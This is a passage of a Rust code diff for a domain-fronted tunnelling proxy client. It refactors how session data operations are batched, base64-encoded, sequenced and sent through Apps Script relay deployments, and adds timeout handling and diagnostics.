-                        None
-                    } else {
-                        Some(B64.encode(&data))
+                        data: Some(data),
+                        encode_empty: true,
+                        seq: None,
+                        wseq: None,
                     };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    // If adding this op would exceed limits, fire current
-                    // batch first and start a new one.
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "data".into(),
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
+                }
+                MuxMsg::Data { sid, data, seq, wseq, reply } => {
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "data",
                         sid: Some(sid),
                         host: None,
                         port: None,
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq,
+                        wseq,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::UdpOpen {
                     host,
@@ -428,70 +852,32 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
                     data,
                     reply,
                 } => {
-                    let encoded = if data.is_empty() {
-                        None
-                    } else {
-                        Some(B64.encode(&data))
-                    };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "udp_open".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "udp_open",
                         sid: None,
                         host: Some(host),
                         port: Some(port),
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq: None,
+                        wseq: None,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::UdpData { sid, data, reply } => {
-                    let encoded = if data.is_empty() {
-                        None
-                    } else {
-                        Some(B64.encode(&data))
-                    };
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "udp_data".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "udp_data",
                         sid: Some(sid),
                         host: None,
                         port: None,
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
+                        data: if data.is_empty() { None } else { Some(data) },
+                        encode_empty: false,
+                        seq: None,
+                        wseq: None,
+                    };
+                    accum.push_or_fire(op, op_bytes, reply, &sems, &fronter).await;
                 }
                 MuxMsg::Close { sid } => {
                     close_sids.push(sid);
@@ -499,35 +885,145 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
             }
         }
 
+        // `close` ops piggyback on whatever batch we're about to fire — no
+        // reply channel, no payload, just tell tunnel-node to drop the sid.
         for sid in close_sids {
-            data_ops.push(BatchOp {
-                op: "close".into(),
+            accum.pending_ops.push(PendingOp {
+                op: "close",
                 sid: Some(sid),
                 host: None,
                 port: None,
-                d: None,
+                data: None,
+                encode_empty: false,
+                seq: None,
+                wseq: None,
             });
         }
 
-        if data_ops.is_empty() {
+        if accum.pending_ops.is_empty() {
             continue;
         }
 
-        fire_batch(&sems, &fronter, data_ops, data_replies).await;
+        fire_batch(&sems, &fronter, accum.pending_ops, accum.data_replies).await;
+    }
+}
+
+/// Per-iteration accumulator for `mux_loop`. Owns the three fields that
+/// the data-bearing arms used to mutate in lockstep, with a single
+/// `push_or_fire` entry point so the cap-then-push pattern lives in one
+/// place instead of being copy-pasted into every arm.
+struct BatchAccum {
+    pending_ops: Vec<PendingOp>,
+    data_replies: Vec<(usize, BatchedReply)>,
+    payload_bytes: usize,
+}
+
+impl BatchAccum {
+    fn new() -> Self {
+        Self {
+            pending_ops: Vec::new(),
+            data_replies: Vec::new(),
+            payload_bytes: 0,
+        }
+    }
+
+    /// Append `op` (with its `reply` channel and pre-computed `op_bytes`),
+    /// firing the current accumulator first if `op` would push us past
+    /// `MAX_BATCH_OPS` or `MAX_BATCH_PAYLOAD_BYTES`. After a fire the
+    /// accumulator is fresh for the new op.
+    async fn push_or_fire(
+        &mut self,
+        op: PendingOp,
+        op_bytes: usize,
+        reply: BatchedReply,
+        sems: &Arc<HashMap<String, Arc<Semaphore>>>,
+        fronter: &Arc<DomainFronter>,
+    ) {
+        if should_fire(self.pending_ops.len(), self.payload_bytes, op_bytes) {
+            fire_batch(
+                sems,
+                fronter,
+                std::mem::take(&mut self.pending_ops),
+                std::mem::take(&mut self.data_replies),
+            )
+            .await;
+            self.payload_bytes = 0;
+        }
+        let idx = self.pending_ops.len();
+        self.pending_ops.push(op);
+        self.data_replies.push((idx, reply));
+        self.payload_bytes += op_bytes;
+    }
+}
+
+/// Threshold predicate for `BatchAccum::push_or_fire`: would adding an
+/// op of `op_bytes` to a batch already holding `pending_len` ops and
+/// `payload_bytes` of base64 cross either the per-batch op cap or
+/// the payload-size cap?
+///
+/// Extracted from the inline `if` so the tunable boundary — including
+/// the "first op never fires" rule (`pending_len == 0`) — has direct
+/// unit-test coverage without spinning up a real `fire_batch`.
+///
+/// `saturating_add` keeps the helper's contract self-contained: a
+/// pathological `op_bytes` near `usize::MAX` clamps to "yes, fire"
+/// rather than wrapping around and silently letting an oversized op
+/// slip past the cap. Today's callers only feed `encoded_len(n)` on
+/// reasonable buffer sizes, but the predicate is the wrong place to
+/// rely on caller bounds.
+fn should_fire(pending_len: usize, payload_bytes: usize, op_bytes: usize) -> bool {
+    pending_len > 0
+        && (pending_len >= MAX_BATCH_OPS
+            || payload_bytes.saturating_add(op_bytes) > MAX_BATCH_PAYLOAD_BYTES)
+}
+
+/// Exact base64-encoded length of `n` raw bytes (standard padding):
+/// `((n + 2) / 3) * 4`. Used by `mux_loop` to enforce
+/// `MAX_BATCH_PAYLOAD_BYTES` without doing the actual encoding inline —
+/// that work now happens in `fire_batch`'s spawned task.
+fn encoded_len(n: usize) -> usize {
+    n.div_ceil(3) * 4
+}
+
+/// Build the wire-shape `BatchOp` from an internal `PendingOp`. Free
+/// function so the encoding contract — non-empty data → encoded,
+/// empty connect_data → `Some("")`, anything else empty → `None` — is
+/// directly testable without spinning up the mux loop.
+fn encode_pending(p: PendingOp) -> BatchOp {
+    let d = match (&p.data, p.encode_empty) {
+        (Some(b), _) if !b.is_empty() => Some(B64.encode(b)),
+        (Some(_), true) => Some(String::new()),
+        _ => None,
+    };
+    BatchOp {
+        op: p.op.into(),
+        sid: p.sid,
+        host: p.host,
+        port: p.port,
+        d,
+        seq: p.seq,
+        wseq: p.wseq,
     }
 }
 
 /// Pick a deployment, acquire its per-account concurrency slot, and spawn
 /// a batch request task.
 ///
-/// The batch HTTP round-trip is bounded by `BATCH_TIMEOUT` so a slow or
-/// dead tunnel-node target cannot hold a pipeline slot (and block waiting
-/// sessions) forever.
+/// The batch HTTP round-trip is bounded by `DomainFronter::batch_timeout()`
+/// so a slow or dead tunnel-node target cannot hold a pipeline slot (and
+/// block waiting sessions) forever. Each batch makes a single attempt —
+/// no client-side retry against a different deployment, because
+/// tunnel-node's `drain_now` mutates the per-session buffer when building
+/// a response, so a lost response means lost bytes (silent gap on the
+/// client side). Without server-side ack / sequence support a replay
+/// would either duplicate writes (payload ops) or silently skip bytes
+/// (empty polls). Sessions whose batch times out re-poll on the next
+/// tick — same recovery surface as pre-#1088.
 async fn fire_batch(
     sems: &Arc<HashMap<String, Arc<Semaphore>>>,
     fronter: &Arc<DomainFronter>,
-    data_ops: Vec<BatchOp>,
-    data_replies: Vec<(usize, oneshot::Sender<Result<TunnelResponse, String>>)>,
+    pending_ops: Vec<PendingOp>,
+    data_replies: Vec<(usize, BatchedReply)>,
 ) {
     let script_id = fronter.next_script_id();
     let sem = sems
@@ -535,46 +1031,136 @@ async fn fire_batch(
         .cloned()
         .unwrap_or_else(|| Arc::new(Semaphore::new(CONCURRENCY_PER_DEPLOYMENT)));
     let permit = sem.acquire_owned().await.unwrap();
+    pipeline_debug::batch_acquire();
     let f = fronter.clone();
 
     tokio::spawn(async move {
+        struct BatchGuard;
+        impl Drop for BatchGuard { fn drop(&mut self) { pipeline_debug::batch_release(); } }
+        let _batch_guard = BatchGuard;
         let _permit = permit;
         let t0 = std::time::Instant::now();
-        let n_ops = data_ops.len();
-
-        // Bounded-wait: if the batch takes longer than BATCH_TIMEOUT,
-        // all sessions in this batch get an error and can retry.
+        let n_ops = pending_ops.len();
+
+        // Encode payloads to base64 here, off the single mux thread.
+        // With 50 ops × 64 KB this is up to ~3 MB of work; doing it on
+        // the mux task previously serialized every op behind whichever
+        // batch was currently encoding.
+        let data_ops: Vec<BatchOp> = pending_ops.into_iter().map(encode_pending).collect();
+
+        // Bounded-wait: if the batch takes longer than the configured
+        // batch timeout (Config::request_timeout_secs), all sessions in
+        // this batch get an error and can retry-poll on the next tick.
+        let batch_timeout = f.batch_timeout();
         let result = tokio::time::timeout(
-            BATCH_TIMEOUT,
+            batch_timeout,
             f.tunnel_batch_request_to(&script_id, &data_ops),
         )
         .await;
+        let sid_short = &script_id[..script_id.len().min(8)];
         tracing::info!(
             "batch: {} ops → {}, rtt={:?}",
             n_ops,
-            &script_id[..script_id.len().min(8)],
+            sid_short,
             t0.elapsed()
         );
 
         match result {
             Ok(Ok(batch_resp)) => {
+                f.record_batch_success(&script_id);
+                // Wire the Full-mode usage counter that #230 / #362 flagged
+                // as stuck-at-zero. Each successful batch is one
+                // `UrlFetchApp.fetch()` call against the deploying Google
+                // account's daily quota — bytes-counted is the inbound JSON
+                // response which is the closest analogue to the apps_script
+                // path's `record_today(bytes_received)` (we don't have the
+                // exact response byte count post-deserialize, so we use a
+                // proxy: sum of per-session response payload bytes the
+                // batch carried back). Underestimates by JSON envelope
+                // overhead but is in the right order of magnitude.
+                let response_bytes: u64 = batch_resp
+                    .r
+                    .iter()
+                    .map(|r| {
+                        // `d` carries TCP payload (base64 string len ≈
+                        // 4/3 of decoded bytes; close enough); `pkts`
+                        // carries UDP datagrams (each base64); plus any
+                        // error string. Sum gives a stable proxy for
+                        // "how much did this batch move."
+                        let d = r.d.as_ref().map(|s| s.len() as u64).unwrap_or(0);
+                        let pkts = r
+                            .pkts
+                            .as_ref()
+                            .map(|v| v.iter().map(|p| p.len() as u64).sum::<u64>())
+                            .unwrap_or(0);
+                        d + pkts
+                    })
+                    .sum();
+                f.record_today(response_bytes);
                 for (idx, reply) in data_replies {
                     if let Some(resp) = batch_resp.r.get(idx) {
-                        let _ = reply.send(Ok(resp.clone()));
+                        let _ = reply.send(Ok((resp.clone(), script_id.clone())));
                     } else {
-                        let _ = reply.send(Err("missing response in batch".into()));
+                        tracing::error!(
+                            "batch response mismatch: idx={} but r.len()={} (sent {} ops) from script {}",
+                            idx, batch_resp.r.len(), n_ops, sid_short,
+                        );
+                        let _ = reply.send(Err(format!(
+                            "missing response in batch from script {}",
+                            sid_short
+                        )));
                     }
                 }
             }
             Ok(Err(e)) => {
+                // Read-side timeout from `domain_fronter`: Apps Script didn't
+                // start streaming response bytes within the per-read deadline.
+                // Common cause: deployment's `TUNNEL_SERVER_URL` points at a
+                // dead host, so UrlFetchApp inside Apps Script hangs until its
+                // own internal connect timeout. Strike-counter blacklists the
+                // deployment after a sustained pattern.
+                if matches!(e, FronterError::Timeout) {
+                    f.record_timeout_strike(&script_id);
+                }
                 let err_msg = format!("{}", e);
-                tracing::warn!("batch failed: {}", err_msg);
+                // Decoy / Apps-Script-flake detection. This body string can
+                // mean any of 4 unrelated things (AUTH_KEY mismatch, Apps
+                // Script execution timeout, Google-side flake, ISP-side
+                // truncation #313), so surface all candidates rather than
+                // asserting one. Operators can flip DIAGNOSTIC_MODE in
+                // Code.gs to disambiguate (#404).
+                if err_msg.contains("The script completed but did not return anything") {
+                    tracing::error!(
+                        "batch failed (script {}): got the v1.8.0 decoy/placeholder body — \
+                         could be (1) AUTH_KEY mismatch between mhrv-rs config and Code.gs \
+                         (run a direct curl probe against the deployment to verify), \
+                         (2) Apps Script execution timeout or per-100s quota tear (try \
+                         lowering parallel_concurrency in config), (3) Apps Script \
+                         internal hiccup (transient, retry next batch), or (4) ISP-side \
+                         response truncation (#313 pattern, try a different google_ip). \
+                         To distinguish (1) from the rest: set DIAGNOSTIC_MODE=true at \
+                         the top of Code.gs + redeploy as new version — only AUTH_KEY \
+                         mismatch returns this body in diagnostic mode.",
+                        sid_short
+                    );
+                } else {
+                    tracing::warn!("batch failed (script {}): {}", sid_short, err_msg);
+                }
                 for (_, reply) in data_replies {
                     let _ = reply.send(Err(err_msg.clone()));
                 }
             }
             Err(_) => {
-                tracing::warn!("batch timed out after {:?} ({} ops)", BATCH_TIMEOUT, n_ops);
+                // Whole-batch budget elapsed. Even stronger signal than a
+                // per-read timeout — count it the same way so a truly-stuck
+                // deployment exits round-robin fast.
+                f.record_timeout_strike(&script_id);
+                tracing::warn!(
+                    "batch timed out after {:?} (script {}, {} ops)",
+                    batch_timeout,
+                    sid_short,
+                    n_ops
+                );
                 for (_, reply) in data_replies {
                     let _ = reply.send(Err("batch timed out".into()));
                 }
@@ -606,14 +1192,13 @@ pub async fn tunnel_connection(
         mux.record_preread_skip_port(port);
         None
     } else {
-        let mut buf = vec![0u8; 65536];
+        let mut buf = BytesMut::with_capacity(65536);
         let t0 = Instant::now();
-        match tokio::time::timeout(CLIENT_FIRST_DATA_WAIT, sock.read(&mut buf)).await {
+        match tokio::time::timeout(CLIENT_FIRST_DATA_WAIT, sock.read_buf(&mut buf)).await {
             Ok(Ok(0)) => return Ok(()),
-            Ok(Ok(n)) => {
+            Ok(Ok(_)) => {
                 mux.record_preread_win(port, t0.elapsed());
-                buf.truncate(n);
-                Some(Arc::new(buf))
+                Some(buf.freeze())
             }
             Ok(Err(e)) => return Err(e),
             Err(_) => {
@@ -629,20 +1214,17 @@ pub async fn tunnel_connection(
             ConnectDataOutcome::Unsupported => {
                 mux.mark_connect_data_unsupported();
                 let sid = connect_plain(host, port, mux).await?;
-                // Recover the buffered ClientHello from the Arc so the
-                // first tunnel_loop iteration can replay it. The mux task
-                // may still hold the other ref during the unsupported
-                // reply's settle window — fall back to a clone in that
-                // race (rare; the reply path drops its ref before we
-                // reach here in practice).
-                let bytes = Arc::try_unwrap(data).unwrap_or_else(|a| (*a).clone());
-                (sid, None, Some(bytes))
+                // Replay the buffered ClientHello on the first tunnel_loop
+                // iteration. `Bytes::clone()` is a cheap Arc bump — no
+                // copy of the 64 KB buffer.
+                (sid, None, Some(data))
             }
         },
         None => (connect_plain(host, port, mux).await?, None, None),
     };
 
     tracing::info!("tunnel session {} opened for {}:{}", sid, host, port);
+    pipeline_debug::session_start(&sid);
 
     // Run the first-response write + tunnel_loop inside an async block so
     // any io-error propagates via `?` without bypassing the Close below.
@@ -672,6 +1254,7 @@ pub async fn tunnel_connection(
     .await;
 
     mux.send(MuxMsg::Close { sid: sid.clone() }).await;
+    pipeline_debug::session_end(&sid);
     tracing::info!("tunnel session {} closed for {}:{}", sid, host, port);
     result
 }
@@ -697,6 +1280,11 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc<TunnelMux>) -> std::io::
         Ok(Ok(resp)) => {
             if let Some(ref e) = resp.e {
                 tracing::error!("tunnel connect error for {}:{}: {}", host, port, e);
+                // Only cache here: `resp.e` is the tunnel-node's own connect()
+                // result against the target. The outer `Ok(Err(_))` arm below
+                // is a transport-level failure (relay → Apps Script → tunnel-
+                // node never reached) and tells us nothing about the target.
+                mux.record_unreachable_if_match(host, port, e);
                 return Err(std::io::Error::new(
                     std::io::ErrorKind::ConnectionRefused,
                     e.clone(),
@@ -723,7 +1311,7 @@ async fn connect_plain(host: &str, port: u16, mux: &Arc<TunnelMux>) -> std::io::
 async fn connect_with_initial_data(
     host: &str,
     port: u16,
-    data: Arc<Vec<u8>>,
+    data: Bytes,
     mux: &Arc<TunnelMux>,
 ) -> std::io::Result<ConnectDataOutcome> {
     let (reply_tx, reply_rx) = oneshot::channel();
@@ -736,13 +1324,16 @@ async fn connect_with_initial_data(
     .await;
 
     let resp = match reply_rx.await {
-        Ok(Ok(resp)) => resp,
+        Ok(Ok((resp, _script_id))) => resp,
         Ok(Err(e)) => {
             if is_connect_data_unsupported_error_str(&e) {
                 tracing::debug!("connect_data unsupported for {}:{}: {}", host, port, e);
                 return Ok(ConnectDataOutcome::Unsupported);
             }
             tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e);
+            // Outer transport failure (relay/Apps Script never reached the
+            // tunnel-node). Don't poison the destination cache from here —
+            // see `connect_plain` for the same reasoning.
             return Err(std::io::Error::new(
                 std::io::ErrorKind::ConnectionRefused,
                 e,
@@ -768,6 +1359,8 @@ async fn connect_with_initial_data(
 
     if let Some(ref e) = resp.e {
         tracing::error!("tunnel connect_data error for {}:{}: {}", host, port, e);
+        // `resp.e` is the tunnel-node's own connect result — cache it.
+        mux.record_unreachable_if_match(host, port, e);
         return Err(std::io::Error::new(
             std::io::ErrorKind::ConnectionRefused,
             e.clone(),
@@ -819,132 +1412,479 @@ fn is_connect_data_unsupported_error_str(e: &str) -> bool {
     (e.contains("unknown op") || e.contains("unknown tunnel op")) && e.contains("connect_data")
 }
 
+/// Metadata for one in-flight Data op, returned alongside its reply.
+struct InflightMeta {
+    seq: u64,
+    was_empty_poll: bool,
+    send_at: Instant,
+}
+
+
 async fn tunnel_loop(
     sock: &mut TcpStream,
     sid: &str,
     mux: &Arc<TunnelMux>,
-    mut pending_client_data: Option<Vec<u8>>,
+    pending_client_data: Option<Bytes>,
 ) -> std::io::Result<()> {
     let (mut reader, mut writer) = sock.split();
-    let mut buf = vec![0u8; 65536];
-    let mut consecutive_empty = 0u32;
 
-    loop {
-        // Cadence depends on whether the tunnel-node is doing long-poll
-        // drains. With long-poll, the server holds empty polls open up
-        // to its `LONGPOLL_DEADLINE` (~5 s currently), so the client
-        // can keep this read timeout short — the wait is on the wire,
-        // not here. Against a *legacy* tunnel-node (no long-poll, fast
-        // empty replies), the same short cadence + always-poll behavior
-        // would generate continuous round-trips on idle sessions and
-        // burn Apps Script quota. The `server_no_longpoll` flag detects
-        // the legacy case from reply latency below and reverts to the
-        // pre-long-poll cadence: long sleep on local read, skip empty
-        // polls when sustained-idle.
-        let legacy_mode = mux.server_no_longpoll();
-        let client_data = if let Some(data) = pending_client_data.take() {
-            Some(data)
-        } else {
-            let read_timeout = match (legacy_mode, consecutive_empty) {
-                (_, 0) => Duration::from_millis(20),
-                (_, 1) => Duration::from_millis(80),
-                (_, 2) => Duration::from_millis(200),
-                (false, _) => Duration::from_millis(500),
-                (true, _) => Duration::from_secs(30),
-            };
-
-            match tokio::time::timeout(read_timeout, reader.read(&mut buf)).await {
-                Ok(Ok(0)) => break,
-                Ok(Ok(n)) => {
-                    consecutive_empty = 0;
-                    Some(buf[..n].to_vec())
-                }
-                Ok(Err(_)) => break,
-                Err(_) => None,
+    let inflight_cap = INFLIGHT_ACTIVE;
+    let mut max_inflight = INFLIGHT_OPTIMIST.min(inflight_cap);
+    let mut consecutive_empty = 0u32;
+    let mut consecutive_data: u32 = 0;
+    let mut is_elevated = false;
+    let mut total_download_bytes: u64 = 0;
+    let mut next_send_seq: u64 = 0;
+    let mut next_write_seq: u64 = 0;
+    let mut next_data_write_seq: u64 = 0;
+    let mut eof_seen = false;
+    let mut client_closed = false;
+    let mut pending_writes: BTreeMap<u64, (TunnelResponse, String)> = BTreeMap::new();
+
+    // Buffered upload data waiting to be sent (when pipeline is full).
+    let mut buffered_upload: Option<Bytes> = None;
+
+    enum ReplyOutcome {
+        Ok(TunnelResponse, String),
+        BatchErr(String),
+        Timeout,
+        Dropped,
+    }
+    type ReplyFut =
+        std::pin::Pin<Box<dyn std::future::Future<Output = (InflightMeta, ReplyOutcome)> + Send>>;
+    let mut inflight: FuturesUnordered<ReplyFut> = FuturesUnordered::new();
+
+    // Helper: wrap a reply_rx into a ReplyFut with timeout.
+    fn wrap_reply(
+        meta: InflightMeta,
+        reply_rx: oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) -> std::pin::Pin<Box<dyn std::future::Future<Output = (InflightMeta, ReplyOutcome)> + Send>> {
+        Box::pin(async move {
+            match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await {
+                Ok(Ok(Ok((r, sid)))) => (meta, ReplyOutcome::Ok(r, sid)),
+                Ok(Ok(Err(e))) => (meta, ReplyOutcome::BatchErr(e)),
+                Ok(Err(_)) => (meta, ReplyOutcome::Dropped),
+                Err(_) => (meta, ReplyOutcome::Timeout),
             }
-        };
-
-        // Legacy-server skip: against a non-long-polling tunnel-node,
-        // an empty poll is wasted work — fast-empty reply, no push
-        // delivery benefit. Preserve the pre-long-poll behavior of
-        // going quiet after a few empties. Long-poll-capable servers
-        // skip this branch and always send the empty op so the server
-        // can hold it open.
-        if legacy_mode && client_data.is_none() && consecutive_empty > 3 {
-            continue;
-        }
+        })
+    }
 
-        let data = client_data.unwrap_or_default();
-        let was_empty_poll = data.is_empty();
+    /// Send an empty poll Data op. Returns the InflightMeta and reply rx.
+    #[inline]
+    fn send_empty_poll(
+        sid: &str,
+        next_send_seq: &mut u64,
+        mux: &Arc<TunnelMux>,
+    ) -> (
+        InflightMeta,
+        oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) {
+        let seq = *next_send_seq;
+        *next_send_seq += 1;
+        let (reply_tx, reply_rx) = oneshot::channel();
+        let send_at = Instant::now();
+        mux.send_sync(MuxMsg::Data {
+            sid: sid.to_string(),
+            data: Bytes::new(),
+            seq: Some(seq),
+            wseq: None,
+            reply: reply_tx,
+        });
+        let meta = InflightMeta { seq, was_empty_poll: true, send_at };
+        (meta, reply_rx)
+    }
 
+    /// Send a data op with wseq. Returns the InflightMeta and reply rx.
+    #[inline]
+    fn send_data_op(
+        sid: &str,
+        data: Bytes,
+        next_send_seq: &mut u64,
+        next_data_write_seq: &mut u64,
+        mux: &Arc<TunnelMux>,
+    ) -> (
+        InflightMeta,
+        oneshot::Receiver<Result<(TunnelResponse, String), String>>,
+    ) {
+        let seq = *next_send_seq;
+        *next_send_seq += 1;
+        let wseq = *next_data_write_seq;
+        *next_data_write_seq += 1;
         let (reply_tx, reply_rx) = oneshot::channel();
         let send_at = Instant::now();
-        mux.send(MuxMsg::Data {
+        let sid_short = &sid[..sid.len().min(8)];
+        tracing::info!(
+            "sess {}: upload send seq={} wseq={} len={}B",
+            sid_short, seq, wseq, data.len(),
+        );
+        mux.send_sync(MuxMsg::Data {
             sid: sid.to_string(),
             data,
+            seq: Some(seq),
+            wseq: Some(wseq),
             reply: reply_tx,
-        })
-        .await;
+        });
+        let meta = InflightMeta { seq, was_empty_poll: false, send_at };
+        (meta, reply_rx)
+    }
 
-        // Bounded-wait on reply: if the batch this op landed in is slow
-        // (dead target on the tunnel-node side), don't block this session
-        // forever — timeout and let it retry on the next tick.
-        let resp = match tokio::time::timeout(REPLY_TIMEOUT, reply_rx).await {
-            Ok(Ok(Ok(r))) => r,
-            Ok(Ok(Err(e))) => {
-                tracing::debug!("tunnel data error: {}", e);
-                break;
-            }
-            Ok(Err(_)) => break, // channel dropped
-            Err(_) => {
-                tracing::warn!("sess {}: reply timeout, retrying", &sid[..sid.len().min(8)]);
-                consecutive_empty = consecutive_empty.saturating_add(1);
-                continue;
-            }
-        };
+    // ── Initial path: send pending client data or read from client ──
+    if let Some(data) = pending_client_data {
+        if !data.is_empty() {
+            let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+            tracing::debug!(
+                "sess {}: pending data seq={}",
+                &sid[..sid.len().min(8)],
+                meta.seq,
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
+        }
+    }
 
-        // Legacy-server detection: an empty-in/empty-out round trip
-        // that finishes well under `LEGACY_DETECT_THRESHOLD` is
-        // structurally impossible on a long-poll-capable tunnel-node
-        // (the server holds the response either until data arrives or
-        // until its long-poll deadline). One observation flips the
-        // sticky flag for the rest of this process. Skip the check
-        // once already in legacy mode — the comparison is cheap, but
-        // calling `mark_server_no_longpoll` repeatedly muddies logs.
-        if !legacy_mode && was_empty_poll {
-            let reply_was_empty = resp.d.as_deref().map(str::is_empty).unwrap_or(true);
-            if reply_was_empty && send_at.elapsed() < LEGACY_DETECT_THRESHOLD {
-                mux.mark_server_no_longpoll();
+    // Send initial pre-fill empty polls (optimist depth), staggered
+    // 1s apart so they land in separate batches. The pending data op
+    // (if any) already occupies one slot.
+    {
+        let polls_to_send = max_inflight.saturating_sub(inflight.len());
+        for i in 0..polls_to_send {
+            if i > 0 {
+                tokio::time::sleep(Duration::from_secs(1)).await;
             }
+            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+            tracing::debug!(
+                "sess {}: prefill poll seq={}, inflight={}",
+                &sid[..sid.len().min(8)],
+                meta.seq,
+                inflight.len() + 1,
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
+        }
+    }
+
+    // Timer for staggered refill polls — fires in the select, never blocks.
+    let mut refill_at: Option<std::pin::Pin<Box<tokio::time::Sleep>>> = None;
+    let mut refill_steps: u32 = 0;
+
+    // Schedule initial refill if pre-fill didn't fill all slots.
+    if inflight.len() < max_inflight {
+        refill_at = Some(Box::pin(tokio::time::sleep(Duration::from_millis(100))));
+        refill_steps = 0;
+    }
+
+    // Read buffer for client socket.
+    let mut read_buf = BytesMut::with_capacity(65536);
+
+    // Main select loop — handles both upload reads and download replies.
+    loop {
+        // If nothing in flight and tunnel EOF, we're done.
+        if inflight.is_empty() && eof_seen {
+            break;
         }
 
-        if let Some(ref e) = resp.e {
-            tracing::debug!("tunnel error: {}", e);
+        // If nothing in flight and client closed, we're done.
+        if inflight.is_empty() && client_closed {
             break;
         }
 
-        let got_data = match write_tunnel_response(&mut writer, &resp).await? {
-            WriteOutcome::Wrote => true,
-            WriteOutcome::NoData => false,
-            WriteOutcome::BadBase64 => {
-                // Tunnel-node gave us garbage; tear the session down but
-                // do NOT propagate as an io error — the caller's Close
-                // guard will clean up on the tunnel-node side.
-                break;
+        // If eof was seen but inflight is not empty, give remaining
+        // replies a short grace period to deliver any buffered data
+        // before the remote connection closed. After 500ms, abandon them.
+        if eof_seen && !inflight.is_empty() {
+            match tokio::time::timeout(Duration::from_millis(500), inflight.next()).await {
+                Ok(Some((meta, ReplyOutcome::Ok(resp, script_id)))) => {
+                    if meta.seq == next_write_seq {
+                        let _ = write_tunnel_response(&mut writer, &resp).await;
+                        next_write_seq += 1;
+                        while let Some(entry) = pending_writes.first_entry() {
+                            if *entry.key() != next_write_seq { break; }
+                            let (_, (buffered_resp, _)) = entry.remove_entry();
+                            let _ = write_tunnel_response(&mut writer, &buffered_resp).await;
+                            next_write_seq += 1;
+                        }
+                    } else {
+                        pending_writes.insert(meta.seq, (resp, script_id));
+                    }
+                    continue;
+                }
+                _ => break,
             }
-        };
+        }
 
-        if resp.eof.unwrap_or(false) {
-            break;
+        // When inflight is empty and we haven't seen eof, read from
+        // client or send an empty poll to keep the session alive.
+        if inflight.is_empty() && !eof_seen {
+            let all_legacy = mux.all_servers_legacy();
+
+            // If all servers are legacy and we've had many consecutive
+            // empties, wait for client data before sending.
+            if all_legacy && consecutive_empty > 3 && !client_closed {
+                read_buf.reserve(65536);
+                match reader.read_buf(&mut read_buf).await {
+                    Ok(0) => break,
+                    Ok(n) => {
+                        consecutive_empty = 0;
+                        let data = extract_bytes(&mut read_buf, n);
+                        let (meta, reply_rx) = send_data_op(sid, data, &mut next_send_seq, &mut next_data_write_seq, mux);
+                        inflight.push(wrap_reply(meta, reply_rx));
+                        continue;
+                    }
+                    Err(_) => break,
+                }
+            }
+
+            let (meta, reply_rx) = send_empty_poll(sid, &mut next_send_seq, mux);
+            tracing::debug!(
+                "sess {}: keepalive poll seq={}", &sid[..sid.len().min(8)], meta.seq
+            );
+            inflight.push(wrap_reply(meta, reply_rx));
         }
 
-        if got_data {
-            consecutive_empty = 0;
-        } else {
-            consecutive_empty = consecutive_empty.saturating_add(1);
+        // Can we read from the client? Yes if not closed, not eof, and
+        // we have room for more inflight ops (fast-path allows +4 extra).
+        let can_read = !client_closed && !eof_seen && inflight.len() < max_inflight + 4;
+
+        tokio::select! {
+            biased;
+
+            // Refill timer: 100ms steps, send empty poll after 10 steps
+            // (1s) for batch separation.
+            _ = async { refill_at.as_mut().unwrap().await }, if refill_at.is_some() => {
+                refill_at = None;
